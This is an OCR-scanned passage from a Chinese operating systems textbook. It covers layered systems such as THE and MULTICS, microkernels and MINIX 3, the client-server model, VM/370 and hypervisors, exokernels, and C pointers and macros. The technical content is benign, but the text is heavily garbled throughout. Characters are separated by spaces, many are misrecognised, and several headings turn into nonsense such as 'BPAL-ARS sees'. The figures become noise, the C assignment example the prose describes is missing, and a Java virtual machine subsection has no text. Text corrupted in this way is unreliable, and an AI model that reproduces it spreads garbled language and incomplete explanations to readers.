1.7.2 ”层次 式 系统 


把 图 1-24 中 的 系统 进一步 通用 化 ， 就 变 成 一 个 层次 式 结构 的 操作 
系统 ， 它 的 上 层 软 件 都 是 在 下 一 层 软 件 的 基础 之 上 构建 的 。 
E.W.Dijkstra 和 他 的 学 生 在 荷兰 的 Eindhoven 技 术 学 院 所 开发 的 THE 系 统 
(1968) ， 是 按 此 模型 构造 的 第 一 个 操作 系统 。THE 系 统 是 为 集 兰 的 
一 种 计算 机 ，Electrologica X8， 配 备 的 一 个 简单 的 批 处 理 系统 ， 其 内 


存 只 有 32K 个 字 ， 每 字 27 位 (二进制 位 在 那 时 是 很 昂贵 的 ) 。 


该 系统 共 分 为 六 层 ， 如 图 1-25 所 示 。 处 理 器 分 配 在 第 0 层 中 进行， 
当中 断 发 生 或 定时 器 到 期 时 ， 由 该 层 进行 进程 切换 。 在 第 0 层 之 上 ， 系 
统 由 一 些 连 续 的 进程 所 组 成 ， 编 写 这 些 进程 时 不 用 再 考虑 在 单 处 理 器 
上 多 进程 运行 的 细节 。 也 就 是 说 ， 在 第 0 层 中 提供 了 基本 的 CPU 多 道 程 
序 功能 。 


操作 员 - 进程 通信 


1-25 THE 操作 系统 的 结构 


内 存 管理 在 第 1 层 中 进行 ， 它 分 配 进 程 的 主 存 空间 ， 当 内 存 用 完 时 
则 在 一 个 512K 字 的 磁 或 上 保留 进程 的 一 部 分 (页面) 。 在 第 1 层 上 ， 
进程 不 用 考虑 它 是 在 位 茎 上 还 是 在 内 存 中 运行 。 第 1 层 软件 保证 一 旦 需 
要 访问 某 一 页 面 时 ， 该 页 面 必 定 已 在 内 存 中 。 


第 2 层 处 理 进 程 与 操作 员 控 制 合 〈 即 用 户 ) 之 间 的 通信 。 在 这 层 的 
上 部 ， 可 以 认为 每 个 进程 都 有 自己 的 操作 员 控 制 台 。 第 3 层 管理 W/O 设 
备 和 相关 的 信息 流 缓 冲 区 。 在 第 3 层 上 ， 每 个 进程 都 与 有 民 好 特性 的 抽 
象 1O 设 备 打 交道 ， 而 不 必 考 虑 外 部 设备 的 物理 细节 。 人 第 4 层 是 用 户 程 
序 层 。 用 户 程 序 不 用 考虑 进程 、 内 存 、 控 制 台 或 WO 设备 管理 等 细 条 。 
系统 操作 员 进 程 位 于 第 5 层 中 。 


在 MULTICS 系 统 中 采用 了 更 进一步 的 通用 层次 化 概念 。 
MULTICS 由 许多 的 同心 环 构 造 而 成 ， 而 不 是 采用 层次 化 构造 ， 内 层 环 
比 外 层 环 有 更 高 的 级 别 (它们 实际 上 是 一 样 的 ) 。 当 外 环 的 过 程 欲 调 
用 内 环 的 过 程 时 ， 它 必须 执行 一 条 等 价 于 系统 调用 的 TRAP 指 令 。 在 
执行 该 TRAP 指 令 前 ， 要 进行 严格 的 参数 合法 性 检查 。 在 MULTICS 
中 ， 尽 管 整 个 操作 系统 是 各 个 用 户 进程 的 地 址 空间 的 一 部 分 ， 但 是 硬 
件 仍 能 对 单个 过 程 (实际 是 内 存 中 的 一 个 段 ) 的 读 、 写 和 执行 进行 保 
护 。 


实际 上 ，THE 分 层 方案 只 是 为 设计 提供 了 一 些 方便 ， 因 为 该 系统 
的 各 个 部 分 最 终 仍 然 被 链接 成 了 完整 的 单个 目标 程序 。 而 在 MULTICS 
里 ， 环 形 机 制 在 运行 中 是 实际 存在 的 ， 而 且 是 由 硬件 实现 的 。 环 形 机 
制 的 一 个 优点 是 很 容易 扩展 ， 可 用 以 构造 用 户 子 系统 。 例 如 ， 在 一 个 
MULTICS 系 统 中 ， 教 授 可 以 写 一 个 程序 检查 学 生 们 编写 的 程序 并 给 他 
们 打分 ， 在 第 n 个 环 中 运行 教授 的 程序 ， 而 在 第 n+1 个 环 中 运行 学 生 的 
程序 ， 这 样 学 生 们 融 无 法 修改 教授 所 给 出 的 成 绩 。 


1.7.3” 微 内 核 


在 分 层 方式 中 ， 设 计 着 要 确定 在 哪里 划分 内 核 - 用 户 的 边 弄 。 在 传 
统 上 ， 所 有 的 层 痢 在 内 核 中 ， 但 是 这 样 做 没有 必要 。 事 实 上 ， 尺 可 能 
减少 内 核 态 中 功能 的 做 法 更 好 ， 因 为 内 核 中 的 钳 误 会 快速 拖 款 系统 。 
相反 ， 可 以 把 用 户 进程 设置 为 具有 较 小 的 权限 ， 这 样 ， 某 一 个 错误 的 
后 琳 束 不 会 是 致命 的 。 


有 不 少 研究 人 员 对 每 千 行 代码 中 错误 的 数量 进行 了 分 析 (例如 ， 
Basilli 和 Perricone，1984; Ostrand 和 Weyuker，2002) 。 代 码 错误 的 密 
度 取决 于 模块 大 小 、 模 块 寿命 等 ， 不 过 对 一 个 实际 工业 系统 而 言 ， 每 
干 行 代码 中 会 有 10 个 错误 。 这 意味 着 在 有 5 百 万 行 代码 的 单 体操 作 系 统 
中 ， 大 约 有 50 000 个 内 核 错 误 。 当 然 ， 并 不 是 所 有 的 错误 都 是 致命 的 ， 
诸如 给 出 了 不 正确 的 故障 信息 之 类 的 某 些 错误 ， 实 际 是 很 少 发 生 的 。 
无 论 怎样 看 ， 操 作 系 统 中 充满 了 错误 ， 所 以 计算 机 制造 商 设置 了 复位 
按钮 (通常 在 前 面板 上 ) ， 而 电视 机 、 立 体 音响 以 及 汽车 的 制造 商 们 
则 不 这 样 做 ， 尽 管 在 这 些 闭 置 中 也 有 大 量 的 软件 。 


在 微 内 核 设计 背后 的 思想 是 ， 为 了 实现 高 可 靠 性 ， 将 操作 系统 划 
分 成 小 的 、 民 好 定义 的 模块 ， 只 有 其 中 一 个 模块 一 一 微 内 核 一 一 运行 
在 内 核 仿 上 ， 其 余 的 模块 ， 由 于 功能 相对 弱 些 ， 则 作为 普通 用 户 进 程 
运行 。 特 别 地 ， 由 于 把 每 个 设备 驱动 和 文件 系统 分 别 作为 普通 用 户 进 


程 ， 这 些 模块 中 的 错 旋 虽然 会 使 这 些 模块 月 省， 但 是 不 会 使 得 整个 系 
统 死机 。 所 以 ， 在 音频 张 动 中 的 错误 会 使 声音 断 续 或 停止 ， 但 是 不 会 
使 整个 计算 机 震 掉 。 相 反 ， 在 单 体系 统 中 ， 由 于 所 有 的 设备 张 动 都 在 
内 核 中 ， 一 个 有 故障 的 音频 旨 动 会 很 容易 引起 对 无 效 地 址 的 引用 ， 从 
而 造成 恼人 的 系统 立即 停机 。 


有 许多 微 内 核 已 经 实现 并 投入 应 用 (Accetta 等 人 ，1986; Kirsch 等 
人 ，2005; Heiser 等 人 ，2006; Herder 等 人 ，2006; Hildebrand, 1992; 
Haertig 等 人 ，1997; Liedtke, 1993, 1995, 1996; Pike 等 人 ，1992; 
Zuberi 等 人 ，1999) 。 微 内 核 在 实时 、 工 业 、 航 空 以 及 军事 应 用 中 特别 
流行 ， 这 些 领域 都 是 关键 任务 ， 需 要 有 高 度 的 可 靠 性 。 知 名 的 微 内 核 
有 Integrity、K42、L4、PikeOS、QNX、Symbian， 以 及 MINIX 3 等 。 这 
里 对 MINIX 3 做 一 简单 鸭 介 绍 ， 该 操作 系统 把 模块 化 的 思想 推 到 了 极 
致 ， 它 将 大 部 分 操作 系统 分 解 成 许多 独立 的 用 户 态 进程 。MINIX 3 遵守 
POSIX， 可 在 www.minix3.org (Herder 等 人 ，2006a; Herder A, 
2006b) 站 点 获得 免费 的 开放 源 代码 。 


MINIX 3 微 内 核 只 有 3200 行 C 语 言 代码 和 800 行 用 于 非常 低层 次 功 
能 的 汇编 语言 代码 ， 诸 如 捕 提 中断、 进程 切换 等 。C 代 码 管 理 和 调度 进 
程 、 处 理 进 程 间 通信 《在 进程 之 间 传送 信息 ) 、 提 供 大 约 35 个 内 核 调 
用 ， 它 们 使 得 操作 系统 的 其 余部 分 可 以 完成 其 工作 。 这 些 调用 完成 诸 
如 连接 中 断 句柄 、 在 地 址 空间 中 移动 数据 以 及 为 新 创建 的 进程 安装 新 


的 内 存 映像 等 。MINIX 3 的 进程 结构 如 图 1-26 所 示 ， 其 中 内 核 调用 的 句 
柄 用 Sys 标 记 。 时 钟 设备 驱动 也 在 内 核 中 ， 因 为 这 个 驱动 与 调度 如 交互 
密切 。 所 有 的 其 他 设备 驱动 都 作为 单独 的 用 户 进程 运行 。 


[一 — 进程 
yp oN yn fs ? y“ ail / | 
(Shell) (Make) ‘Other) / | 
heyy’ > NEE / | 、 本 
= = = H 用 户 程 序 
i | 。 ther tes 
(FS ) \Proc. } Wy (c ar) l 服务 器 
ee ee = 
EEEN EN É A Gi A f \ 7 二 pts 
(Disk) (TTY) (Netw) (Print) (Other) | 驱动 程序 
< > “ J Q SA Q x A \ > 


微 内 核 中 断 处 理 、 进 程 、 调 度 、 
”进程 间 通 信 (IPC) 


0 


图 1-26 MINIX 3 系统 的 结构 


在 内 核 的 外 部 ， 系 统 的 构造 有 三 层 进程 ， 它 们 都 在 用 户 态 中 运 
行 。 最 底层 中 包含 设备 驱动 器 。 由 于 它们 在 用 户 态 中 运行 ， 所 以 不 能 
物理 地 访问 IO 端口 空间 ， 也 不 能 直接 发 出 MO 命令 。 相 反 ， 为 了 能 够 对 
IO 设备 编程 ， 张 动 器 构建 了 一 个 结构 ， 指 明 哪个 参数 值 写 到 哪个 MO 端 
口 ， 并 生成 一 个 内 核 调 用 ， 通 知 内 核 完 成 写 操 作 。 这 个 处 理 意 味 着 内 
核 可 以 检查 驱动 正在 对 WO 的 读 (或 写 ) 是 否 是 得 到 授权 使 用 的 。 这 
样 ， (与 单 体 设计 不 同 ) ， 一 个 有 错误 的 音频 驱动 器 就 不 能 够 个 发 性 
地 在 硬盘 上 进行 写 操作 。 


ERREUR- APA, Be aise, ENERE 
统 多 数 的 工作 。 有 一 个 或 多 个 文件 服务 器 管理 着 文件 系统 ， 进 程 管理 
器 创建 、 破 坏 和 管理 进程 等 。 通 过 给 服务 器 发 送 短 消息 请 求 POSIX 系 
统 调用 的 方式 ， 用 户 程序 获得 操作 系统 的 服务 。 例 如 ， 一 个 需要 调用 
read 的 进程 发 送 一 个 消息 给 某 个 文件 服务 器 ， 告 知 它 需要 读 什么 内 容 。 


有 一 个 有 趣 的 服务 器 ， 称 为 再 生 服 务 右 ( 
其 任务 古 检 查 其 他 服务 器 和 驱动 右 的 功能 十 否 正确 。 一 旦 检查 出 一 个 
错误 ， 它 目 动 取代 之 ， 无 须 任何 用 户 的 干预 。 这 种 方式 使 得 系统 具有 
目 修复 能 力 ， 并 且 获 得 了 较 高 的 可 靠 性 。 


reincarnation server) i 


系统 对 每 个 进程 的 权限 有 着 许多 限制 。 正 如 已 经 提 及 的 ， 设 备 驱 
动 右 只 能 与 授权 的 MO 端口 接触 ， 对 内 核 调 用 的 访问 也 是 按 单个 进程 进 
THA, hes EAR A HH MER IRI ABET © at 
程 也 可 获得 有 限 的 许可 ， 让 在 内 核 的 其 他 进程 访问 其 地 址 空间 。 例 
如 ， 一 个 文件 系统 可 以 为 磁盘 驰 动 俘获 得 一 种 允许 ， 主 内 核 在 该 文件 
系统 的 地 址 空间 内 的 特定 地 址 上 进行 对 一 块 的 一 个 新 读 操 作 。 总 体 来 
说 ， 所 有 这 些 限制 是 让 每 个 驱动 和 服务 器 只 拥有 完成 其 工作 所 需要 的 
权限 ， 别 无 其 他 ， 这 样 束 极 大 地 限制 了 故障 部 件 可 能 造成 的 危害 。 


一 个 与 小 内 核 相关 联 的 思想 古 在 内 核 中 的 机 制 与 策略 分 离 的 原 
则 。 为 了 更 清晰 地 说 明 这 一 点 ， 让 我 们 考虑 进程 调度 。 一 个 比较 简单 
的 调度 算法 是 ， 对 每 个 进程 赋予 一 个 优先 级 ， 并 让 内 核 执 行 在 具有 最 


高 优先 级 进程 中 可 以 运行 的 某 个 进程 。 这 里 ， 机 制 〈 在 内 核 中 ) 就 是 
寻找 最 高 优先 级 的 进程 并 运行 之 。 而 策略 《赋予 进程 以 优 移 级 ) 可 以 
由 用 户 态 中 的 进程 完成 。 在 这 个 方式 中 ， 机 制 和 策略 是 分 离 的 ， 从 而 
使 系统 内 核 变 得 更 小 。 


1.7.4 BPAL-ARS sees 


一 个 微 内 核 思想 的 略微 变 体 是 将 进程 划分 为 两 类 : ARS, BET 
ARA arte PRS; 客户 端 ， 使 用 这 些 服务 。 这 个 模式 丈 是 所 谓 的 
客户 机 -服务 郁 模 式 。 通 种 ， 在 系统 最 确 层 生 微 内 核 ， 但 并 不 是 必须 这 
样 的。 这 个 模式 的 本 质 是 存在 客户 端 进程 和 服务 瑚 进程 。 


一 般 地 ， 在 客户 端 和 服务 器 之 间 的 通信 和 是 消息 传递 。 为 了 获得 一 
个 服务 ， 客 户 端 进程 构造 一 段 消 息 ， 说 明 所 需要 的 服务 ， 并 将 其 发 给 
合适 的 服务 大 。 该 服务 完成 工作 ， 发 送 回 应 。 如 果 客 户 端 和 服务 瑚 运 
行 在 同一 个 机 器 上 ， 则 有 可 能 进行 某 种 优化 ， 但 是 从 概念 上 看 ， 在 这 
里 讨论 的 是 消息 传递 。 


这 个 思想 的 一 个 显然 的 、 普 裔 方式 是 ， 客 户 端 和 服务 器 运 行 在 不 
同 的 计算 机 上 ， 它 们 通过 局 域 或 广域网 连 授 ， 如 图 1-27 所 示 。 由 于 客户 
端 通过 发 送 消 息 与 服务 器 通 信 ， 客 户 端 并 不 需要 知道 这 些 消 息 是 在 它 
们 的 本 地 机 器 上 处 理 ， 还 是 通过 网 络 被 送 到 远程 机 器 上 人 处理 。 对 于 客 
尸 问 而 言 ， 这 两 种 情形 是 一 样 的 ， 都 是 发 送 请 求 并 得 到 回应 。 所 以 ， 
客户 机 -服务 郁 模 式 是 一 种 可 以 应 用 在 单机 或 者 网 络 机 瑚 上 的 抽象 。 
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消息 从 客户 机 
到 服务 器 


图 1-27 在 网 络 上 的 客户 机 -服务 万 模型 


越 来 越 多 的 系统 ， 包 括 用 户 家 里 的 PC 机 ， 都 成 为 了 客户 端 ， 而 在 
某 地 运行 的 大 型 机 器 则 成 为 服务 占 。 事 实 上 ， 许 多 Web 束 古 以 这 个 方式 
运行 的 。 一 台 PC 机 向 某 个 服务 器 请 求 一 个 Web 页 面 ， 而 后 ， 该 Web 页 面 
回 送 。 这 束 是 网 络 中 客户 机 -服务 万 的 典型 应 用 方式 。 


1.7.5 “虚拟 机 


OS/360 的 最 早 版 本 是 纯粹 的 批 处 理 系 统 。 然 而 ， 有 许多 360 用 户 希 
望 能 够 在 终端 上 交互 工作 ， 于 是 在 IBM 公 司 内 外 的 一 些 研究 小 组 决定 
为 它 编写 一 个 分 时 系统 。 在 后 来 推出 了 正式 的 IBM 分 时 系统 ， 
TSS/360。 但 是 它 非常 上 庞大， 运行 缓慢 ， 于 是 在 花费 了 约 五 二 万 美元 的 
研制 费用 后 ， 该 系统 最 后 被 弃 之 不 用 (Graham, 1970) 。 但 是 在 碾 省 
剑桥 的 一 个 IBM 研 究 中 心 开发 了 男 一 个 完全 不 同 的 系统 ， 这 个 系统 被 
IBM 最 终 用 作为 产品 。 它 的 直接 后 续 ， 称 为 ZVM， 目 前 在 IBM 的 现 有 
大 型 机 上 广泛 使 用 ，zSeries 则 在 大 型 公司 的 数据 中 心中 广泛 应 用 ， 例 
如 ， 作 为 e-commerce 服 务 器 ， 它 们 每 秒 可 以 处 理 成 百 上 千 个 事务 ， 并 
使 用 达 数 百 万 G 字 节 的 数据 库 。 


1.VM/370 


这 个 系统 最 初 被 命名 为 CP/CMS， 后 来 改名 为 VM/370 (Seawright 
和 MacKinnon，1979) 。 它 是 源 于 如 下 一 种 机 敏 的 观察 。 分 时 系统 应 该 
提供 这 些 功能 : (1) 多 道 程序 ， (2) 一 个 比 裸 机 更 方便 的 、 有 扩展 
界面 的 计算 机 。VM/370 存 在 的 目的 是 将 二 者 彻底 地 隔离 开 来 。 


这 个 系统 的 核心 称 为 虚拟 机 监控 程序 (virtual machine monitor) ， 
它 在 裸 机 上 运行 并 且 具 备 了 多 道 程序 功能 。 该 系统 向 上 层 提 供 了 若干 


台 虚 拟 机 ， 如 图 1-28 所 示 。 它 不 同 于 其 他 操作 系统 的 地 方 是 ， 这 些 虚拟 
机 不 是 那 种 具有 文件 等 优 民 特 征 的 扩展 计算 机 。 与 之 相反 ， 它 们 仅仅 
苹 课 机 硬件 的 精确 复制 品 。 这 个 复制 品 包 含 了 内 核 态 /用 户 态 、1/O 功 

能 、 中 断 及 其 他 真实 硬件 所 应 该 具有 的 全 部 内 容 。 


虚拟 370 


系统 调用 
IO 指令 陷阱 


陷阱 


图 1-28 配 有 CMS 的 VM/370 结 构 


由 于 每 台 虚 拟 机 都 与 裸 机 相同 ， 所 以 在 每 台 虚 拟 机 上 都 可 以 运行 
一 台 裸 机 所 能 够 运行 的 任何 类 型 的 操作 系统 。 不 同 的 虚拟 机 可 以 运行 
不 同 的 操作 系统 ， 而 且 实际 上 往往 就 是 如 此 。 在 早期 的 VM/370 系 统 
上 ， 有 一 些 系统 运行 OS/360 或 其 他 大 型 批 处 理 或 事务 处 理 操作 系统 
的 某 一 个 ， 而 另 一 些 虚拟 机 运行 单 用 户 、 交 互 式 系统 供 分 时 用 户 们 使 
用 ， 这 个 系统 称 为 会 话 监控 系统 (Conversational Monitor System, 


CMS) 。 后 者 在 程序 员 中 很 流行 。 


当 一 个 CMS 程 序 执行 系统 调用 时 ， 该 调用 被 陷入 到 其 虚拟 机 的 操 
作 系 统 上 ， 而 不 是 VM/370 上 ， 似 乎 它 运 行 在 实际 的 机 器 上 ， 而 不 是 在 


虚拟 机 上 。CMS 然 后 发 出 普通 的 硬件 WO 指令 读 出 虚拟 磁盘 或 其 他 需要 
执行 的 调用 。 这 些 WO 指 令 由 VM/370 陷 入 ， 然 后 ， 作 为 对 实际 硬件 模拟 
的 一 部 分 ，VM/370 完 成 指令 。 通 过 对 多 道 程序 功能 和 提供 扩展 机 器 二 
者 的 完全 分 离 ， 每 个 部 分 都 变 得 非常 简单 ， 非 常 灵活 且 容 易 维 护 。 


虚拟 机 的 现代 化 刁 ，zZ/VM， 通 利用 于 运行 多 个 完整 的 操作 系统 ， 
而 不 是 简化 成 如 CMS 一 样 的 单 用 户 系 统 。 例 如 ，zSeries 有 能 力 随 着 传 
统 的 IBM 操 作 系 统一 起 ， 运 行 一 个 或 多 个 Linux 虚 拟 机 。 


2. 虚 拟 机 的 再 次 发 现 


IBM 拥 有 虚拟 机 产品 已 经 有 四 十 年 了 ， 而 有 人 少数 公司 ， 包 括 Sun 
Microsystems 公 司 和 Hewlett-Packard 等 公司 ， 近 来 也 在 他 们 的 高 端 企业 
服务 器 上 增加 对 虚拟 机 的 文 持 ， 在 PC 机 上 ， 直 到 最 近 之 前 ， 虚 拟 化 的 
思想 在 很 大 程度 上 被 忽略 了 。 不 过 近年 来 ， 新 的 需求 ， 新 的 软件 和 新 
的 技术 的 结合 已 经 使 得 虚拟 机 成 为 一 个 热点 。 


首先 看 需求 。 传 统 上 ， 许 多 公司 在 不 同 的 计算 机 上 ， 有 时 还 在 不 
同 的 操作 系统 上 上， 运行 其 邮件 服务 器 、Web 服 务 右 、FTP 服 务 器 以 及 其 
他 服务 器 。 他 们 看 到 虚拟 化 可 以 使 他 们 在 同一 台 机 器 上 运行 所 有 的 服 
务 上 器， 而 不 会 由 于 一 个 服务 右 朋 并， 整 影 响 其 余 的 系统 。 


虚拟 化 在 Web 托 管 世界 里 也 很 流行 。 没 有 虚拟 化 ，Web 托 管 客 户 端 
只 能 共享 托管 (在 Web 服 务 器 上 给 客户 端 一 个 账号 ， 但 古 不 能 控制 整个 


服务 器 软件 ) 以 及 独占 托管 (提供 客户 端 整个 机 器 ， 这 样 虽然 很 灵 
活 ， 但 是 对 于 小 型 或 中 型 Web 站 点 而 言 ， 成 本 效益 比 不 高 ) 。 当 Web 托 
管 公司 提供 租用 虚拟 机 时 ， 一 台 物 理 机 右 束 可 以 运行 许多 虚拟 机 ， 
个 虚拟 机 看 起 来 都 是 一 合 完全 的 机 瑚 。 租 用 虚拟 机 的 客户 端 可 以 运行 
目 己 想 使 用 的 操作 系统 和 软件 ， 但 是 只 要 支付 独占 一 台 机 器 的 儿 分 之 
一 的 费用 〈 因 为 同一 台 物 理 机 器 可 以 同时 支持 多 人 台 虚 拟 机 ) 。 


虚拟 化 的 另外 一 个 用 途 是 ， 为 希望 同时 运行 两 个 或 多 个 操作 系 
统 ， 比 如 Windows 和 Linux 的 最 终 用 户 服务 ， 某 个 偏好 的 应 用 程序 可 运 
行 在 一 个 操作 系统 上 ， 而 其 他 的 应 用 程序 可 运行 在 不 同 的 操作 系统 
上 。 如 图 1-29a 所 示 的 情形 ， 而 术语 “虚拟 机 监控 程序 ”近年 来 已 经 变化 
成 类 型 1 虚拟 机 管理 程序 (type 1 hypervisor) 。 
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图 1-29 a) 类 型 1 虚拟 机 管理 程序 ，b) 类 型 2 虚拟 机 管理 程序 


现在 考察 软件 。 虚 拟 机 的 吸引 力 是 没有 和 争议 的 ， 问 题 在 于 实现 。 
为 了 在 一 台 计 算 机 上 运行 虚拟 机 软件 ， 其 CPU 必 须 被 虚拟 化 (Popek 和 
Goldberg, 1974) 。 不 过 在 外 这 中 ， 存 在 一 些 问题 。 当 运行 虚拟 机 (在 
用 户 态 中 ) 的 操作 系统 执行 某 个 特权 指令 时 ， 比 如 修改 PSW 或 进行 IO 
操作 ， 人 硬件 实际 上 陷入 到 了 虚拟 机 中 ， 这 样 有 天 指令 束 可 以 在 软件 中 
模拟 。 在 某 些 CPU 上 (特别 是 Pentium 和 它 的 后 继 者 ， 以 及 其 克隆 版 
中 ) 试图 在 用 户 态 中 执行 特权 指令 时 ， 会 被 名 略 掉 。 这 样 一 种 特性 ， 
使 得 在 这 类 硬件 中 无 法 实现 虚拟 机 ， 这 也 解释 了 PC 机 世界 中 ， 缺 乏 对 
虚拟 机 兴趣 的 原因 。 当 然 ， 对 于 Pentium 而 言 ， 还 有 解释 器 可 以 运行 在 
Pentium 上 ， 但 是 其 性 能 丧失 了 5~10 倍 ， 这 样 对 于 要 求 高 的 工作 来 说 ， 
WAANT ° 


由 于 20 世 纪 90 年 代 若 干 学 术 人 研究 小 组 的 努力 ， 特 别 是 斯 坦 福 大 学 
的 Disco (Bugnion 等 人 ，1997) ， 实 现 了 商业 化 产品 (例如 VMware 工 
作 站 ) ， 人 们 对 虚拟 机 的 热情 复兴 了 “。VMware 工 作 站 是 类 型 2 虚拟 机 
管理 程序 ， 如 图 1-29b 所 示 “。 与 运行 在 裸 机 上 的 类 型 1 虚拟 机 管理 程序 不 
同 ， 类 型 2 虚拟 机 管理 程序 作为 一 个 应 用 程序 运行 在 Windows、Linux 或 
其 他 操作 系统 上 ， 这 些 系 统称 为 宿主 机 操作 系统 。 在 类 型 2 管理 程序 启 
动 后 ， 它 从 CD-ROM 安 装 盘 中 读 入 供 选择 的 客体 操作 系统 ， 并 安装 在 
一 个 虚拟 一 上 ， 该 盘 实 际 只 是 宿主 机 操作 系统 文件 系统 中 的 一 个 大 文 
件 。 


在 客户 端 操 作 系统 局 动 时 ， 它 完成 在 真实 硬件 上 相同 的 工作 ， 如 
局 动 一 些 后 台 进 程 ， 然 后 是 GUI。 某 些 管理 程序 一 块 一 块 地 翻译 客户 端 
操作 系统 的 二 进 制程 序 ， 人 代替 含有 管理 程序 调用 的 特定 控制 指令 。 翻 
译 后 的 块 可 以 立即 执行 ， 或 者 缓存 起 来 供 后 续 使 用 。 


处 理 控 制 指 令 的 一 种 不 同方 式 是 ， 修 改 操作 系统 ， 删 掉 它们 。 这 
种 方式 不 是 真正 虚拟 化 ， 而 是 准 虚 拟 化 (paravirtualization) 。 我 们 将 
在 第 8 章 具体 讨论 虚拟 化 。 


3.Java 虚 拟 机 


1.7.6 SMŽ 


与 虚拟 机 克隆 真实 机 器 不 同 ， 另 一 种 策略 是 对 机 器 进行 分 区 ， 换 
名 话说， 给 每 个 用 户 整 个 资源 的 一 个 子 集 。 这 样 ， 某 一 个 虚拟 机 可 能 
得 到 磁盘 的 0 至 1023 和 一 块 ， 而 另 一 台 虚 拟 机 会 得 到 1024 至 2047 熏 块 ， 等 
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在 底层 中 ， 一 种 称 为 外 核 (exokemel，Engler 等 人 ，1995) 的 程 
序 在 内 核 态 中 运行 。 它 的 任务 是 为 虚拟 机 分 配 资源 ， 并 检查 试图 使 用 
这 些 资源 的 企图 ， 以 确保 没有 机 器 会 使 用 他 人 的 资源 。 每 个 用 户 层 的 
虚拟 机 可 以 运行 目 己 的 操作 系统 ， 如 VM/370 和 Pentium 虚 拟 8086 等 ， 
但 限制 在 只 能 使 用 已 经 申请 并 且 获 得 分 配 的 那 部 分 资源 。 


外 核 机 制 的 优点 是 ， 它 减少 了 映像 层 。 在 其 他 的 设计 中 ， 每 个 虚 
拟 机 都 认为 它 有 目 己 的 磁 副 ， 其 盘 块 号 从 0 到 最 大 编号 ， 这 样 虚 拟 机 监 
控 程 序 必须 维护 一 张 表格 用 以 重 映像 磁盘 地 址 (以 及 其 他 资源 ，。 有 
了 外 核 这 个 重 映 像 处 理 束 不 需要 了 。 外 核 只 需要 记录 已 经 分 配给 各 个 
虚拟 机 的 有 关 资 源 即 可 。 这 个 方法 还 有 一 个 优点 ， 它 将 多 道 程序 (在 
外 核 内 ) 与 用 户 操作 系统 代码 (在 用 户 空间 内 ) 加 以 分 离 ， 而 且 相 应 
负载 并 不 重 ， 这 征 因为 外 核 所 做 的 一 切 ， 只 是 保持 多 个 虚拟 机 彼此 不 
发 生 冲 突 。 


1.8 依靠 C 的 世界 


操作 系统 通 币 定 由 许多 程序 员 写 成 的 ， 包 括 很 多 部 分 的 大 型 C 
(有 时 是 C++) 程序 。 用 于 开发 操作 系统 的 环境 ， 与 个 人 (如 学 生 ) 
用 于 编写 小 型 Java 程 序 的 环境 是 非常 不 同 的 。 本 市 试图 为 那些 有 时 编 
写 Jave 的 程序 员 简 要 地 介绍 编写 操作 系统 的 环境 。 


1.8.1 Ci 语言 


本 部 分 不 是 C 语 言 的 指南 ， 而 是 一 个 有 关 C 和 Java 之 间 的 关键 送别 
的 简要 介绍 。Java 是 基于 C 的 ， 所 以 两 者 之 间 有 许多 类 似 之 处 。 两 者 都 
是 命令 式 的 语言 ， 例 如 ， 有 数据 类 型 、 变 量 和 控制 语句 等 。 在 C 中 基 
本 数据 类 型 是 整数 〈 包 括 短 整 数 和 长 整数 ) 、 字 符 和 浮 点 数 等 。 使 用 
数组 、 结 构 体 和 联合 ， 可 以 构造 组 合 数据 类 型 。C 语 言 中 的 控制 语句 
与 Java 类 似 ， 包 括 if、switch、for 以 及 while 等 语句 。 在 这 两 个 语言 中 ， 
函数 和 参数 大 致 相同 。 


一 项 C 语 言 中 有 的 而 Java 中 没有 的 特点 是 显 式 指针 (explicit 
pointer) 。 指 针 是 一 种 指向 〈 即 包含 对 象 的 地 址 ) 一 个 变量 或 数据 结 
构 的 变量 。 考 虑 下 面 的 语句 


char c1, c2, *p; 


这 些 语句 声明 cl1 和 c2 是 字符 变量 ， 而 p 是 指向 一 个 字符 的 变量 ( 即 
包含 字符 的 地 址 ) 。 第 一 个 赋值 语句 将 字符 c 的 ASCII 代 码 存 到 变量 c1 
中 。 第 二 个 语句 将 cl 的 地 址 赋 给 指针 变量 p。 第 三 个 语句 将 由 p 指 问 变 
量 的 内 容 赋 给 变量 c2， 这 样 ， 在 这 些 语句 执行 之 后 ，c2 也 含有 ec 的 
ASCII 代 码 。 在 理论 上 ， 指 针 是 输入 类 型 ， 所 以 不 能 将 浮 点 数 地 址 赋 
给 一 个 字符 指针 ， 但 是 在 实践 中 ， 编 译 器 接受 这 种 赋值 ， 尽 管 有 时 给 
出 一 个 警告 。 指 针 是 一 种 非常 强大 的 结构 ， 但 是 如 果 不 仔细 使 用 ， 也 


会 是 造成 大 量 错误 的 一 个 原因 。 


C 语 言 中 没有 的 包括 内 建 字符 串 、 线 程 、 包 、 类 、 对 象 、 类 型 安 
全 (type safety) 以 及 垃圾 回收 (garbage collection) 等 。 最 后 这 一 个 
是 操作 系统 的 一 个 “淋浴 器 塞 子 *。 在 C 中 分 配 的 存储 空间 或 者 是 静态 
的 ， 或 者 是 程序 员 明 确 分 配 和 释放 的 ， 通 常 使 用 malloc 以 及 free 库 范 
数 。 正 是 由 于 后 面 这 个 性 质 一 一 全 部 由 程序 员 控 制 所 有 内 存 一 一 而 且 
是 用 明确 的 指针 ， 使 得 C 语 言 对 编写 操作 系统 而 言 非常 有 吸引 力 。 操 
作 系 统 从 一 定 程度 上 来 说 ， 实 际 上 是 个 实时 系统 ， 即 便 通 用 系统 也 是 
实时 系统 。 当 中 断 发 生 时 ， 操 作 系统 可 能 只 有 若干 微 秒 去 完成 特定 的 
操作 ， 天 则 就 会 丢失 关键 的 信息 。 在 任意 时 刻 启动 垃圾 回收 功能 是 不 
可 接受 的 。 


1.8.2 AX 


一 个 操作 系统 项 目 通常 包括 多 个 目录 ， 每 个 目录 都 含有 许多 .c 文 
件 ， 这 些 文件 中 存 有 系统 某 个 部 分 的 代码 ， 而 一 些 .h 头 文件 则 包含 供 
一 个 或 多 个 代码 文件 使 用 的 声明 以 及 定义 。 头 文件 还 可 以 包括 简单 的 
宏 ， 诸 如 


#define BUFFER_SIZE 4096 


宏 人 允许 程序 员 命 名 常数 ， 这 样 在 代码 中 出 现 的 BUFFER_SIZE， 在 
编译 时 该 常数 就 被 数值 4096 所 替代 。 良 好 的 C 程 序 设 计 实践 应 该 除了 
0，1 和 -1 之 外 命名 所 有 的 常数 ， 有 时 把 这 三 个 数 也 进行 命名 。 宏 可 以 
附带 参数 ， 例 如 


#define max(a,b)(a>b?a:b) 


这 个 宏 允 许 程序 员 编 写 


i=max(j, k+1) 


从 而 得 到 


i=(j>k+1?j:k+1) 


